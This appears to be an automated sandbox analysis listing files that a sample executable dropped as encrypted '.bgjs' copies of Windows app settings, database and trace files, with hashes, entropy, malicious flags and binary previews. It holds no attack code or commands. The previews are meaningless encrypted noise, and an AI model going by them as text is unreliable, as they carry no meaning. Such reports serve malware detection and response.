                                                                                                                                      Preview:regf..iB...w....K....J...slZ7..#..q.....#..+.i^..]...P.X..Z.....D.l....AQ&wZ.:.se.<0.K..xe.y...W.].._"..R....Y..R..~.Dz.aj~y...d.L@.%.*CO...:.i.$%.........SL*.q)..=.+..".m......zR...1..!.....r`...bF.r.KL.....@...6N..m*.|}.h0..B.^......@..Y...c.!..M........0qF.e]..FR"#.<^..>...h.W.|...p.+.w/,......S~nL..1l...&....j.aU.R..H.."C.R..>.b.u.GB.A......|..-.S...".O^......-.=.<s.....{clN.{..tIm...|..@....{...B.jw`4...<...R..X..K...J..?3|..C.SLCILEV.]C~..!......v..A.V....XD.S.J..,..5.....eb.6..n..6.PQu;.*.W.=oZ...........[.~..].A..?.....A.(.g9{..).e.4t.{....P..U.*0hP.?F.$.l...)5.}7B..........9.3.}G...cYk.4..'.Z(.p.....H..M.WSQK..a..G[.8.......r...q11,a>.'.I../.....T.,..S.Vo...._r.i.'..D.)...b.P..Xp...oa.Z.....?.Mo..;5.uAK..y..GM...?..&.U....X{...s.o.....7u*l.. ihG..Q...g,k...ER......L_......em(....swD{.7..C._M.....,.9g..KO{.}Q....>w.WXc...W|.........b..vg....z.*....r..*3^Ex....C..U8m..*...k...H...%..)..9./:..9.. G..=.^../.e[....0...E.A/.....w....N_4.vd9.~d.W

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974500410238633
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:f7gtavl6gQPpLciFiM825+EGDhJPwaJLk6bifT0mgiTpz6T:jgtQWX82uhJ5tk6WfTfgv
                                                                                                                                      MD5:E421AFB68979450892A9D30A406BB31F
                                                                                                                                      SHA1:31E8916C86EFBDD50670EFC9A7796E52447A3176
                                                                                                                                      SHA-256:B8B68743859F357500185D9739F6D5899B4CFB1D0B9AE8E65E49773CC90DAED8
                                                                                                                                      SHA-512:1E75F5DB4061EF3BB616F7FC8A0BF861CFA78C1AB06ED891867085AB1A30E5114AF399EA60652E52A589FDB01195FCC6BA2AB4999D76DFE7B0008336D43864EB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.&(.J.nc.k..K.u..6..Qj..,J..?.]..V...r.x|..j..q.....v...T.%n.......(..c.*.0/...:X.\.R...8...%.uPzg;...%v*..~~(..XxC...... ......l....Cf....#.9..../..|...(..L.kX''F...!.W|V.<l.....eB.I.....[<..".O......z....m.0...\!'>C...'.y.w.iXP.......FY[|......z...G........rv]9._........s+uw....%[.&...gh1M.@....!f.9YTA.:.W.'.Z.@..1]6.V..sl/..A...K..=..:A..w..K.>D.I8.."i....q../........(XFn.V..F1J..f..v.........Dh`..~.....u.......6.L4T#.n..7.".p..X{u..zy.#,._$vF...p{..Gs_..>..).)v..H\.<..3.c...Q.S..tY..)..........(..k.......hw....A.,.....D[c..T.5..7.O.......Q.....,SqJ.....M...U....RAl..4......U.$}.....o.....Q..q..;...y...s..q.%T.f.{I1.e2!......i.g...bh........]$...|.9......3...}.12.N\.%....].\.d..&....qo?..L..M.V..........5"...[0_..(*PNn.D.L...w.~.....7...U.A%J.....=..............$.....vOT.,.-.zM..K.E.X9...!\$..01.s.......qn.N.....L..E.rHT.<0.s.\A0....._.fB.E.6l..g..j.....ju..O*.'....|~....MK.(c.Mm('k.;.V.]........|Q........._........3.'..RU...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9776328628101885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:PZ3jmozAjE7isaqp0c/Xf8k5k+84ZDTAmx6pxopCWaGfGIxt:uoes9Xf8Y5TAmcfopCW93X
                                                                                                                                      MD5:107129B4D07DD91AB9496F00EE060074
                                                                                                                                      SHA1:EAAD31E4E19CFD47C62A1A8159958B7BCE93B522
                                                                                                                                      SHA-256:E527683547A0E9ED0F3575510726A6C3E9353ACB5D0A711A95FA7DD788B19431
                                                                                                                                      SHA-512:E56FF4F55E4CB3D32A1AAFD20DFAFB21FF5A553685C7B99F2F6805EF33DF1710CF109EFD52912E582D05D343AC532E015F7981DD23D2A307DF9034A27E8D585D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..k..CPe....b..2.......i.f....U....h.f.....t......o.'d....%........B4..w2.UK.$e.GZ..2...S.r#RQ......+...5..{.?.v.-.x..H...r{...1d+(g.V..aG.y.....P.~..40..]..>.e.=-H.`.i...?.9m.C.\`5/..4.....!..d.E...R.....L.cE.....V...Q#H..9......(............8..g.y:.....I....a]......h.......L.6.x<..n.f..j`.0\....9...gBIl.....M...g......Y.c...1.]7. .d.......Z9....w.......W.e...-.>.Q.4.... b.....1.].|...x.S....Kr..H.:.p~...{...T...J...s....}......e..b{....]..~...-u.74.......U.g....../.<...@..>..:.=.D........I.j-......\D/pFY..`.P...;.=I.L..).1......3....?yIb./.......9IS...../...$.Ge..x...~..".I,..s.?.#.Dj.....O..h.?z_j<NY...0..b.9..r...K.[.G.".k-....obz...iZ*..Yx...I..)/...s....Z'.H.H..........I.~..;...lF..]e....\c..F..,.".$F..*.z.nj.1.Z....f.d....%..hN..(...#?.X}..S.1.L.+.f...>....8....zc0..fc...4..&R...V.%.E....D....S.:.x...{lKd.2v ....F.....d.....IA6..-.}O......N/.5...A....zR...E.WFq....._...9+~O...j....."VM.[n.......tA~aU..CuEw..(.y.....-..o.....

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978376538260141
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:eImkYWVe78ZkjIlToV5LQaDEVQpGAh/v13aA2Bm6:NmkhewkjyTgGUEW4+V3alBm6
                                                                                                                                      MD5:53A028958153DD8AC7CE8648A30F9B95
                                                                                                                                      SHA1:BDB6A48D9B8A03476D85036AD98E7436718599A9
                                                                                                                                      SHA-256:636496BEC477539CCD830363152DE60282F6CE118BA6F9D13DF7A7595CBEA2D5
                                                                                                                                      SHA-512:87A653666DF13CAFFC6D11F88B013085150758C1A47CD040ACE98DF9527FD095F97A4018D73C4D13DCD292DC4340B6CADDEE9181663864F2A2676A1751B851C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...!1!.>...>.~[.3S7..;...8..q.......=...:..K...ga.8..ka.._<.....2..>1O..o...c9.J....|.....7...N....j.S........~N....."`.2.f.:2.....D...l.}..S.~&.f.o.........+.\.^.Hy.7....@y..z.Wm}A..4.<H.K....1...nN3.n.6{zH.aK|>./....: 3i..UC9.eI..=.Ca4"/nKZ.c..._. .o.[.X......F.IV+$..r.....F...1....7q..?}S......!.B.>..9..T."c.)...3$.....O.......".k(..6.....!z+@....iM...w:N;$*t..Z..v 9.....=....LM.v....8......aG#..y.t.h.B.......Sy..jy..;\....g.C........X...+".e..it.h.hN3..{......w......6.......9....P....vZE.e.T5..%.)*..|...oG...5ux`;...y..i..J..D{.(lVc/2:.-..Z.25"..\..j3UG......c............3[^=.+..4g...p...u........X.0.....D-.p....@$XE......|ssBF.3.....*Svw$..Mt"....*....s.v_...1]..[..v........K..x..j.2m.0........;.@C.Q(.M.._^.k?2}...Df......w2..V.".M%K...*.<|...x.....V.......[.....uS.@^ee......v.l.u.S.'...k...q>.../...Lk;\...*..w.r@..H@..sw.K...y.z.i....Q.n...&jl....GR.D.....5^..9..v.,k....=vAT..5>L$;.Y....Kp.x.9.C..M.....Ch........E.Z....8...l

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.97737700370435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:WM5Np5TIqJBGljBWFzvaHORepS9AGvBAaSF6xoncGRfM:WsJABWFziHORepa/O+7GfM
                                                                                                                                      MD5:B39FEB0DDF939B9362CC60E87272A180
                                                                                                                                      SHA1:3872324EA3C924DD86F2030987E2700740C71899
                                                                                                                                      SHA-256:529DC54A5CDCDF47A077C9D84598D3EA0F8E340704624B413964FCC353C3A670
                                                                                                                                      SHA-512:4B7315E51907ECFDCE267793541DD25212CC777B5558A310CF568DD479EF67A9B7586D99EB060BC8F584183E312006E964B6A7837D3D204BAA7714DC61C0CCEF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..q]...$...Ip..Jv~...o.L.+'.....}....x{..Ng1..?..j.;.v......-.Z..(....(.[.J.b.r.........i...U.Y.!.iW.9dVP..f~-...r....GoP:r.F.L.}.*.0.p.j.6>k.{..k...9.>...T)...N..0..;..v..*G.<.LRlk..u....AdBf..6k..{.,..(.3.&*.2l..~..yP....@.<9....,<(...:9.o.g..5.:...c0.l....._.-uN.....b.&o.].. @t...0,..z. .......W.ztS.G..C.=.<.........1...).E[y.!.R.@1k.1..u.(XKod.d..5.....9..m.R..K..`tER.....@v.{..`..s>a80..a.{.nT.2W/..*!...O...q.6.x..].....>.-{...i'G'..y.L.....G.&.9..I...O.D.......@cj..........I.D.N..u.1n,n...d.u'.X0=.....C.!.........B2.k"..:...c..:..b'..D.X..y..(.R{...`..7.d.I7..E(....hT..........C.f.d.u.Y..my.T5M....)...:.e...5<...x...2bg.#y...%Y*..W.2.Wk...........1Iq......b5....h...P..JP.fO...(...b.(...........nAy..)..?.U]y.Y..7....*r.VY0W D&.g.=..?CVSL..#>/h......$.$..<.M.[.n..cp].&&...]./.(.>g>W..^.}...i..S.`\..?!..:H,.....%.Ty...| ..w!..5h....7......V...=.(.=...hx....Y.>.=E.a@...]."6....N..%.|z..2...p.....4....t.|..;@9P..K\t.f....(*4.......

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.994807679401514
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:WrvLCC5vOKzy23WiWg6Y5OjD80al6WWsOgRp08OfdSY3/cE6ozR:kCuOQUg6AOP80fvgD5Oll9L
                                                                                                                                      MD5:DF03979161EC503F0E4A90B3F203B8A1
                                                                                                                                      SHA1:789F2374EC2AEB88F6BA2A1AB13DCEB675328699
                                                                                                                                      SHA-256:96B9F629DB3DEE038E78595A0605F9B3AAE9BB38B1DFB37DB0D0132609537D24
                                                                                                                                      SHA-512:5F00D28052810D27DA4D07AA1C222238071CB0B44D67AF1E09F72F37B05F059EDD3E66284F9D7479F051254D5F2C9FF44BCA8429DF7E95BFD33E3A5EFAAA5C71
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-..'...'^........F$.v.....*.U.M.;.u.b....;vE.\..7...q.O6e7..R_\..u...jf...|..4,._.6.m..f......t.q..j...B...F.e.;.......TZ.H6..9.oc.[.Jy.......R.3.q.@..[U.,t..3.9l....>\.(..S.0zGh. ..=N.......in.a....D.Dh%\.p.y#......^...%.U..4`.M.~..c..=...K2E.;.@_.. ..LY$J.p]...7..Y.....k..`....Q.*.E....."....S.]..M3..R~......A'...hZ...B{y.@.j..R>.`(p.J.z^.+|. 9...GW.1...7.f.J..^....Z....I'......Z3.y.[[gi9._...I......g...!.`.F*b\.y.c8......M...Q.....L.n]........H..;.^...?....{.3......m....!......$......n N...tj...^.Rl.drb......f..r..B.T....zQ..N.\w.9#:$I..trQwk.X.......^.f............"..F..hHn... .....oWbp....S7....}A.....M....'.")...[.:.9o..(..9g...W...i.>.;9.-.9sV..k...7.ph~rIqd.^_c...L=P..3...-.-.n@...p..@10g...,M..ll..$d..&...!].b.X.1~.,.f..n....$.<Vu.Ar.{QMM.U.9........#...9."......S..hyT.G..?...(...."...~.k...EG.\l...G.8.*&q.........>..U9A....F*."!.2......a ..o.|.a/....zM.K....\..t.._..7.\...n. ....!|y.....Vx.^...Pa......GL..,...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:SQLite Write-Ahead Log, version 14255047
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1347606
                                                                                                                                      Entropy (8bit):1.9816946090744825
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:1kk3gNlKxeH/cMy0mSEgXK26aA6C79bwKaPeshSRnefJZYzlwOuY5h+olR9FEeIx:1kk3gNlKkEDMqsKBshjfvYJb7s
                                                                                                                                      MD5:8EE730888920B5778DABE4D8ABAB728E
                                                                                                                                      SHA1:6416EC3772304F9255C6B8D6F318CA8A50DA3F68
                                                                                                                                      SHA-256:5F79300754CFEFCEE88DE1BB608580ABC5ED7E0E9B47E129896F8B7A2E389900
                                                                                                                                      SHA-512:9454528E2372E378028A4AA750A891C25F64CBB409DDA5A321EF061F6D4D5D29E5429ABA78C361FA2573D1CD9C0E5269BF6AE3353F6A6593FBCFD875539EAC83
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:7......k...E 9Y..0.6?......wk.}J..1e....2.F.......2.q..OO.G@..!.k.EA.....^.Na.]~?...?...`V.:...E|...v.V._..!..[Z,...{:.o......%@.O.P..?.R......T.y..a...U.=Ix. '-.1.]G..j....\..M...z.s.L.....T.)...#..&...+..m..^.\.....;.}*5.H.cA..n.:b[..,.."C.$.#....I.....+.._30 ...Z .r.R{U..lq(..tv..R.y`.....s3B.e...O...(k.h:.`4.....ZwER.$.....>..=6m.._..5..2g._..0`i.@...$...NK#G..2..M. qaC.#r4..y.Q....Z.U.?I..h../W......c..P....n.O!..D.R.,..@.............eqBX..?i.OX..8..1.{...Z.....]..g@eE>>+.I..#i.)...%0.`j.....:.D.....W...V....[8..".w.d..;....L...%$...2.x.X..]..]$....3R.q..k..2.R...r.-.Iz...=..lr.T...Y..PW.`.!..U./ma].?.Y FNj.{..[xv../.rR?.,.~.n.A8.j..>..C......].#v..a.b...^...`.A.(....U(h.........|...d.....B....<.R..{.*..^.....l.Fm.F..5.y..g.|.@..D..K ^V......,mNz......h.i.}h&\GL.H.d..b.:...&.j..}....U.......#...2.6.]....z.........8......hX.....Fa>.y..3...b.-.t.....XsZ.t.M...L..O.uS...TM#qz\2..cZ.k:.*.......Bu..K3....bq...S.Y.6. ..4E(..P.NW.#.R.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4430
                                                                                                                                      Entropy (8bit):7.952364033924956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:BHTHippAslMA3QYUbg4JefV8NnlVcg0eFffRDXn3l:BHTHiHAPNYag4Je693x3l
                                                                                                                                      MD5:3F822D85D939B2B7B5B256DBDB8BC030
                                                                                                                                      SHA1:E8358AA99465EDCF067F699C2EA63E8F644DDCCB
                                                                                                                                      SHA-256:04DD45D2DC4C68614A13BFC1C4597BBA5E14A292DF7326F4BB706F1C068974E0
                                                                                                                                      SHA-512:31C4C8FFF0A97EAB42D26236E2E520B85420EC272F663D6C8CA1E657EBC48550A1E7D8C995C2B7F2D26817F567D9CE1540FA6E8879413B695B94C06627D1D516
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit..8g.......f.c..r.U.H..y{.9..tN.1..7......RUa...x.m...M...4,h........L............:.%Z...D.....v.....}...;.3%..Fnr........v.nR.s.....R.J....=.......7...2l......IF.<......*j........0..ZK.....:K.!.[\19...=..!..+.%..E=y...Y.l....l.......0...Qz....N..Q"_}..i.......D...`...GD>W...e....xm.Dg..@.3..{Tp.}6&D=.......A....@Z.s.~..hC.&2..-2x.Q).....z.`.Q..%......#....=..w...r..PD.lK...~...0....~h.Z.^..S..N.N.m.....e#.,...."~..8g..5...$..yz...[..F..)...\....!.o..s5....H...N..........k.O.V...F..=..F....d....GR.T0.I.2.).....!..Q."U...W.3.l.G.v..y.{y.B..G....T.....f.z:$.......`*Q..N.......5.........d.kS......[$.}..D....@....Y..Fp. O.]=D.......4&X.r......b..C.?5...Z...R....X.$.,..4:1...f.. ..8y.J.9..l'. ....-..":bz\..8..N...J.W.;...H....|.E;.U|.z...dC...D......=.p'.w$8e........k...v....7.<............&._Q.....d.L..x.....V.`0...k.........^.Dv]$...7...F..o.Bgp.|<.z../.r*.j.v..s.e.|.2;0..D.$..=.xIh..5..($\j.. .>....O.*x...M^A......g...k.M2...^...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65870
                                                                                                                                      Entropy (8bit):7.997261820744085
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:5xxFj82fGVr9aSX9YK4Ap7YCaAbHN0z3Rm+EjbYPFqVW:NFjpuySUCHmz3rB
                                                                                                                                      MD5:954CD45C8D9C923D0B5ACBA7CD2D21B2
                                                                                                                                      SHA1:CC0DD335CBB03432FF580A766030F64F935B5431
                                                                                                                                      SHA-256:1B23E597EF96604B6631C2D1EF4ACD1612520964D1A964C8220553972A4698EA
                                                                                                                                      SHA-512:D288939AB327B5AC129DF3B6FDAD219F6A6DEE652927E78AD512374A3A85372B7372FB4144DD7482241EA57FA378DAF26222ACFB72F587FF3D4DD4C65BD42887
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.............|.O...\qk.BN..............sS...H...5.t.B.......v...br.?....@..~)..BR.Q.8l..O..l....,;|.>.E.n.A...=.......A..9..0\.C3....y.h..z....{....XH.O..9D....Y..M..1taaz..o.&;......._..I..X...E6..no.U...r..|.p.i..B..@9.V.<zK..).).I.]...>.p.c..N..oh...._..t..BAI.M...p;...|..5.&..zB$..p!..22y..)..Z...-..P......Gs....PF+..6$j..$..:.,.._|B..d.(.#.wb`.A.y....k..,.@`.*'.[..u.. *.p.....thes~7..`?d.<,......$.=...vP.3.E .-..h.!,..z....E`s.*....i....._.jO.j......T. ..>.(E..I....}m....%B..[.LzA...r..M..{...C..'...mf.x_....b......{.z....s}!....D{...uqk.^..>v..19...P:Q.)K....u>.ktZ.{..~.N..z..&....,......1$.....Y{..........$../..yQ........m.W+....C8.)l..K..AM.HMQ./xj..x ....5...s.......b>.....i.....J.%.D.-.i]c.02..h.]..N/.C...w.j..@.....%..H.k.3-...=....ucH.'...7i....m..m!....4e..DIbf.q!..})Xa.O.'..}...C..nX...i...Y..Q.[...zW......X..+\.d...("....O..i.=}.oO'@`..S.G......HY......(.G...%...h...3.%...3`..$....s.gC......k...Yk.N.....-V>

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978660551748297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wpDng4xzaLndpmelhvU5MmJH1okz8R/shbb2180VS:wpDng4xzWdpPrpmvp8GhpT
                                                                                                                                      MD5:092CCF6552FA11D0B71887E6765068FF
                                                                                                                                      SHA1:D0286633F907988970A726A8BABF1A99C71D0124
                                                                                                                                      SHA-256:C4F838548840AA86C01CA7AF559A62B6A2BD2CCDEA7EF6F152839A22326E2395
                                                                                                                                      SHA-512:776449526FC4C154CEEB8621E7A63CA43B9D74456E05D33FA4B5C768C13A3E3DAC50382067D636B22B78BF4559D29689BF5B3C0044A333E3D16248DBFAD79C69
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..4 Y.>-..s..#..s.............3gj..!D.D.Y.p.Oknh......+.x,j....O...@..*../.?..A.M.4.d).g.k.-....^._i...... x6}.. ..]v.....X8S.A@.:..Q....e..^.%H#Y.X.p.hM.J...\(......j.i.qz.q#......1P.>^.9.39..p..XqJ.x.7.............w....2..I.N..ck.3...!..[......<D.....D.%.........t:.GS.Z.D.]^d.S.... S.....^.J...*..fD`u..u...g..C..>_..#.[.L?C...wV.PX0..t.`RXk..N.n4.c}.o5..fI.X..0.-.2@TK7!^..u&...-......,{.o.-.G....R.Y.a*z9w.f.....c+>"..JC.{7/3.J....8j./..u..Z...L."...).f..3,p.k.e.r....T..6?...:.k...........g..2..p...Xn^..H.H..a.C...?.nb}b.iQ..!......s..{...|.k}.M.IG.t"....T.!.....v....n.....=.P;. &....)c!m0.ppa.v/....G............1r.Z....I...i...D...-bc!d.>.#k.!........'.z....Q...6..s.[}.L....t.....^.}.r...c]....O...A.JEG.6AlN3.r.^,...b....+di....m.bE<X....HG.NR.H....+..\`cv..../N.i.."..U.....A.Z...>._y.8J....j....E......$|]....?bg7x.U.W">,j+...!..8P.%^EV;..e4e.R.u....I.=].d..zE.L.mW.......scl...m.t|/w.P..0..qB.r.{......7*.....e..5u.Gd....y.o(z.i...&Ok.h..g.z%.h

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9806887575513406
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:tsFNrEJWvmCihc6mTj5ToxIu8xcMgR+9XHlf+mxjtVujSs/XhS:tsjEJWA6VTjtkI5cMu+tHpzjQs
                                                                                                                                      MD5:9201E5BCE66F478FEA5C1D7572A59230
                                                                                                                                      SHA1:EB9D0BE0D1623EEFE766DBA22623EBCCAE52736F
                                                                                                                                      SHA-256:08A9EAFBF4C49D3676E25488395A9896F55600B7D9B068365A5085A0C4DF78E1
                                                                                                                                      SHA-512:9D745992D47A2BD4498DA931C506360623F60E82AE80127B8F23E4336C4E8F471C29E2377E5D15B5F06C79CC89119B30CED7A1FC46872B5B3133BA691E02FA4B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.-Z..r.O/...72...Uh...ZR..l..s.!..#.....I.....Xx.I....%..g..&.l...I.S. .*n....k..5..z.w.....D.YTE:e....oZ...X&s4..;e4.E.u.....-.V..].=.....ye[.?.s{.........{<..(...s..hr.......8/d...d(.s....w.....".....$&...*.Z`..~.(.7..>.~2....K{.v...JC.......;.].....0O.C.%....,.vX..e._.G.N.Q+qQ.eq....<d..@.....N.<s~.N.O........6.}....E.....h./.;<&.X....+D.2..R.O+....[z.C....V..:1.`}...J.e...[.P.U....&[5s./I...ptL......4RH..U.E.N.k|.cl....d. .{...[U....[.Q%....V.D..S..x..L..8+.Le.l2.S..Q.j.:.;...RX..NM4...0...8...y......9a..........r<.2SY.v;T.?%.B....[.......|.g........N..g.. b4XF..D.>.....`s...&....Xl{....P.*3k......l..1.I..8p.....5.-..=k.....m=....Z.O.;r..y....^.gOCLa....q/..%.:l.QR.~.?fv3.r.b.).#.Pa..d.V...cOC.O}.:QPF[...C|A1..x.=*/;..J.SM.y..d.:q..Rqp..A+.. ~......=t..%.$.t..c.!.y....|._|O."Y...|@WH$........l.=...n;3......@..o..Z&D.j9...b.a.w{b..g..];]B...0H.?J:Z.M.(.&.D....8.*.1.j+.....W.].X.....E..P;`Z,..*...,.#).&Q..&=.w..m.,S......,7y.......O....+..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976639511794679
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:pyM1jZ4Zt+DXNBpOYDvr6dJk4L+cxLyMBt/q63eWyaWvhNHh6NR6UVX:JdZ4Z6NBgY7r6dGUhxOMBt/8dvjh6NR7
                                                                                                                                      MD5:AB7803596DF04503B8C5ADA5E7079792
                                                                                                                                      SHA1:AA507EA460E4C531B44DA2BCD8F40D6FBE9E6AD8
                                                                                                                                      SHA-256:C13EBAE005A85D210EDBA47DD25608ED04F26B594F2D7286246B277D3B8AA62B
                                                                                                                                      SHA-512:FAAD4167A1A2C188F970842EAC95ABD67FE9369B3A0D28BB59C498638655302F8AAB0DB7B75F23F995C0AD6E21FF78BF7C7452E0F17A116C42C652F691A2BE7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.j.q`Er..Rba....dp!.8D9...4qg............*G....7...I...K.uJ.u...O3q..y}.;..(.{."...?2.......,....[......GZ..qi.M..H..sU..*5\.:[h.v..g)..Pe....b...]mo...7..d....j'....@...Q{\..?..9.7xCNi.*.c.3....1.B....d.q4.$...Ph..o......fKA1.^.Y....d.#..*...H.n\byI.[I.z..]w.......$.*..._.wrO*y4..Y.q..+..h.|.~(.....$V........].;..........2.6.:..bC...r.S./-QG.6.{xS.'.NT..k......%.. ...vUu6..CJ.vX..{d...f...]..z.e{.;..#.......m..!........E....m...Lm...0.t}..`..@..^kd.px.)..a_.'.Z......F.0.O..L....b5.f..l*Fw1...w.y.kVk$..t.....Gl.wF.......yj.8.o.......k.... ..f..X}jN/A...0....y]....T.[.Cxp0R.M.N.4....).,e..D.3.T...I%..S..-.L{6~A...U....tg...z.kX.!......}..;.z....Y..=....)9..R......]yK.&...*.....^T...4..Ko">?.9..,Q....R...PT5j.?....y.6Z.4.....g.I.\.._.T...F8....;......w..ufy...1a!.C.NBx...W."..3.'..~......J...(s..hkj.)3.H......P..9....=b...l..b67......=IZ.0Z.+.c.....1F.DBN.X.V...G...$F.8....{X.=DvI.$u..q...".....E...jK...]...N..)..Lt....n......{

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):39476
                                                                                                                                      Entropy (8bit):7.995708372308648
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:DIhOw2d3py9hXwbghF6KGRBGRo4/b6Y/qCZgwCpvGoFXM0dJ5ef0JH70aqFAqTJC:DQe7yfgUT6Q6Y/qjwYdJB0aqFAqTobb
                                                                                                                                      MD5:4DD5A2D019CC4FAA236DED66EEB2D57D
                                                                                                                                      SHA1:C2E9DBE189360FADD91F109A8C62ECB53315BD1F
                                                                                                                                      SHA-256:B72E8391C9065ADB3BAF5FBF869E501676B534D4EA955C4F1D0467CB06F64B0F
                                                                                                                                      SHA-512:516D76B3BBBFB3AC4D191551EA48ED1C0DA802D2C659BED27F8E6807656709DF31863273492B416B344C448B780614A9003128E95C40C76B60C336B50D5E284D
                                                                                                                                      Malicious:true
